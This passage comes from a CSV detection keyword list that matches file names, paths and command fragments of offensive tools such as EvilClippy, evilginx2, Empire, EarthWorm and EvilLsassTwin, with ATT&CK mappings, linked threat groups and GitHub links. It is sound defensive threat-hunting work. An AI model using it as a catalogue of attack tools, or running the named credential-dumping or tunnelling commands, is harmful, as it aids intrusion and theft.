Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","1","N/A","N/A","10","10","131","31","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z","7063" "*/EventViewer-UACBypass*",".{0,1000}\/EventViewer\-UACBypass.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","N/A","10","2","184","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z","7064" "*/evi1m0.bat*",".{0,1000}\/evi1m0\.bat.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","7065" "*/evil.cpp*",".{0,1000}\/evil\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","N/A","10","10","829","141","2025-04-02T09:37:10Z","2020-08-17T21:33:06Z","7066" "*/evil.dll*",".{0,1000}\/evil\.dll.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","7067" "*/evil.ps1*",".{0,1000}\/evil\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","7068" "*/evil_pdf/*",".{0,1000}\/evil_pdf\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","7069" "*/evil_script.py*",".{0,1000}\/evil_script\.py.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#linux","N/A","9","10","1061","320","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z","7070" "*/evil_script.py*",".{0,1000}\/evil_script\.py.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","7071" "*/EvilClippy*",".{0,1000}\/EvilClippy.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","7072" "*/EvilClippy-*.zip*",".{0,1000}\/EvilClippy\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","N/A","10","10","2165","402","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z","7073" "*/evilclippy.cs*",".{0,1000}\/evilclippy\.cs.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","N/A","10","10","2165","402","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z","7074" "*/EvilClippy.git*",".{0,1000}\/EvilClippy\.git.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","N/A","10","10","2165","402","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z","7075" "*/evilginx*",".{0,1000}\/evilginx.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","Black Basta","Phishing","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","10","1762","340","2024-06-15T17:48:11Z","2022-09-07T02:47:43Z","7076" "*/evilginx2.git*",".{0,1000}\/evilginx2\.git.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat 
- COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","7077" "*/evilginx2/*",".{0,1000}\/evilginx2\/.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","1","#linux","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","7078" "*/evilhost:*",".{0,1000}\/evilhost\:.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-JBoss.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","7079" "*/EvilLsassTwin*",".{0,1000}\/EvilLsassTwin.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","7080" "*/EvilLsassTwin/*",".{0,1000}\/EvilLsassTwin\/.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. 
If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","9","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","7081" "*/EvilnoVNC.git*",".{0,1000}\/EvilnoVNC\.git.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","7082" "*/evil-proxy.git*",".{0,1000}\/evil\-proxy\.git.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","7083" "*/evil-proxy.rb*",".{0,1000}\/evil\-proxy\.rb.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","7084" "*/evil-proxy/*",".{0,1000}\/evil\-proxy\/.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","#linux","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","7085" "*/evilqr.git*",".{0,1000}\/evilqr\.git.{0,1000}","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 
- T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","N/A","3","292","45","2024-06-18T11:27:23Z","2023-06-20T12:58:09Z","7086" "*/evilrdp.git*",".{0,1000}\/evilrdp\.git.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","1","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","7087" "*/evilrdp/*",".{0,1000}\/evilrdp\/.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","1","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","7088" "*/evilscript.ps1*",".{0,1000}\/evilscript\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","7089" "*/evilscript.ps1*",".{0,1000}\/evilscript\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","7090" "*/evilSignatures.db*",".{0,1000}\/evilSignatures\.db.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","7091" "*/EvilSln.git*",".{0,1000}\/EvilSln\.git.{0,1000}","offensive_tool_keyword","EvilSln","A New Exploitation Technique for Visual Studio Projects","T1564.001 - T1204.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/cjm00n/EvilSln","1","1","N/A","N/A","10","5","N/A","N/A","N/A","N/A","7092" "*/EvilSln/*.suo*",".{0,1000}\/EvilSln\/.{0,1000}\.suo.{0,1000}","offensive_tool_keyword","EvilSln","A New Exploitation Technique for Visual Studio Projects","T1564.001 - T1204.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/cjm00n/EvilSln","1","1","N/A","N/A","10","","N/A","","","","7093" "*/EvilTwinServer*",".{0,1000}\/EvilTwinServer.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate 
open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","9","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","7094" "*/EvtMute.git*",".{0,1000}\/EvtMute\.git.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","7095" "*/ew -s lcx_listen -*",".{0,1000}\/ew\s\-s\slcx_listen\s\-.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#linux","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","7096" "*/ew -s lcx_slave -*",".{0,1000}\/ew\s\-s\slcx_slave\s\-.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#linux","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","7097" "*/ew -s lcx_tran -*",".{0,1000}\/ew\s\-s\slcx_tran\s\-.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in 
complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#linux","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","7098" "*/ew -s rcsocks -*",".{0,1000}\/ew\s\-s\srcsocks\s\-.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#linux","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","7099" "*/ew -s ssocksd -*",".{0,1000}\/ew\s\-s\sssocksd\s\-.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#linux","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","7100" "*/Example_C2_Profile*",".{0,1000}\/Example_C2_Profile.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","7101" "*/Example_Payload_Type/*",".{0,1000}\/Example_Payload_Type\/.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - 
T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","7102" "*/ExcelDocWriter.cs*",".{0,1000}\/ExcelDocWriter\.cs.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","7103" "*/exchanger.py*",".{0,1000}\/exchanger\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7104" "*/exchanger.py*",".{0,1000}\/exchanger\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7105" "*/exe_to_dll.git*",".{0,1000}\/exe_to_dll\.git.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts an EXE into a DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","N/A","5","10","1297","197","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z","7106" "*/exe_to_dll.git*",".{0,1000}\/exe_to_dll\.git.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/hasherezade/exe_to_dll","1","1","N/A","N/A","8","10","1297","197","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z","7107" "*/exe2powershell*",".{0,1000}\/exe2powershell.{0,1000}","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","N/A","6","2","172","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z","7108" "*/exec_bin.c*",".{0,1000}\/exec_bin\.c.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 
- T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","7109" "*/exec_diskshadow.py*",".{0,1000}\/exec_diskshadow\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","7110" "*/exec_dll.c*",".{0,1000}\/exec_dll\.c.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","7111" "*/exec_ftp.py*",".{0,1000}\/exec_ftp\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","7112" "*/exec_pcalua.py*",".{0,1000}\/exec_pcalua\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","7113" 
"*/exec_psexec*",".{0,1000}\/exec_psexec.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","7114" "*/exec_psh.c*",".{0,1000}\/exec_psh\.c.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","7115" "*/exec_shdocvw.py*",".{0,1000}\/exec_shdocvw\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation 
